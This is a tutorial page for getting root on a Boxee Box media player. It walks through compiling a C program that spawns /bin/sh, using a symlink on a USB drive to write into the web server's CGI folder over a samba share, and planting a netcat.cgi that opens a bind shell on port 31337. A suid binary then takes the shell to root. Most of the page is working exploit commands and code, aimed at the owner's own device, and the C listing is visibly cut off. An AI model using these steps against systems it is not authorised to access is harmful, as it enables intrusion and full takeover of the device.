Obtaining Root On

Obtaining root on unfortunately isn't as simple as launching an app from within Boxee and click a link. There are a few steps that have to be taken to be able to get root.


  1. Linux
  2. Windows - Note: this is required for the advanced security options in windows on a samba share. Multiple different mount options in linux were tried but none were successful.
  3. USB Thumb Drive
  4. General Knowledge of Shell and Netcat


1. Partition and Format the Thumb Drive to an ext2 filesystem. For this step I used gparted on Ubunutu, but you can use fdisk and mkfs.ext2 as well.

2. To make this work you will need an executable that will execute /bin/sh as root.

Create a the following file suid.c


#include <sys/types.h>
#include <unistd.h>

int main(int argc, char *argv[]) {

    execl("/bin/sh", "sh", "-i", NULL);

32 bit systems:

Compile the suid executable.


 gcc -o suid suid.c

64 bit systems:
(The executable needs to be 32-bit)

Install the 32 bit dev libraries

Command (Ubuntu or debian-based systems):

 sudo apt-get install lib32c-dev

Compile the (32 bit) suid executable


 gcc -m32 -o suid suid.c

3. Mount the thumb drive on your linux system.

4. Copy the suid executable to the thumb drive.

5. Make uid/gid, owned by root, and executable also add full permissions to the root directory of the thumb drive.


chown root:root suid
chmod 755 suid
chmod 777 ./

6. Now you will need to create a symlink on the thumb drive. This symlink needs to point to the directory of where the httpd server on the Box runs.


cd <path to root directory of the thumb drive>
ln -s /data/.persistent/.mrwong/ cgibin

7. Unmount the thumb drive.

8. Enable Windows File Sharing on your Boxee Box. This is located at Settings > Network > Servers > Windows File Shares.

9. Plug the thumb drive into your Boxee Box.

10. Mount your Boxee Box samba share on your linux system.


mount -t cifs -o user=guest //IP_OF_BOXEE_BOX/Media /mnt/location

11. Using a command line terminal browse to the /mnt/location. Once there make your way into the cgibin folder (remember this is the symlink you created earlier)

12. Create a file called netcat.cgi, I used vi, and place the following information into the file.

/usr/bin/nc -l -p 31337 -e /bin/sh

13. Now using your Windows system, browse to your Boxee Box system and make your way to the thumbdrive like before, and go to the cgibin directory.

Note: Make sure that you have Simple File Sharing disabled.

14. Right click on the netcat.cgi file you created, go to the Security tab. There should be three users listed. For each user make sure that the Read and Execute permissions are set and save the changes.

15. Using a browser, go to http://IP_OF_BOXEE_BOX:8080/netcat.cgi, this should just spin for a few seconds and then stop. (this is normal)

16. From your linux system connect to the netcat instance you just started.


nc IP_OF_BOXEE_BOX 31337

You should just be at the next line in your terminal. You should also be able to run any command now. Try running 'id'. For all commands make sure you add a semi-colon to the end. For example id;

The output of id should be:

uid=2(nobody) gid=2(nobody)

17. Now you can change directories to your thumbdrive in the netcat session. First change into the /mnt folder, you should see a GUID valued directory. Change into that directory


18. Run the following command, ls



19. Run ./suid;, you should just be returned to the next line.

20. Run id;, you should see the following output.

uid=0(root) gid=0

Congratulations! You now have successfully obtained root level permissions on the Box. Use it wisely.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License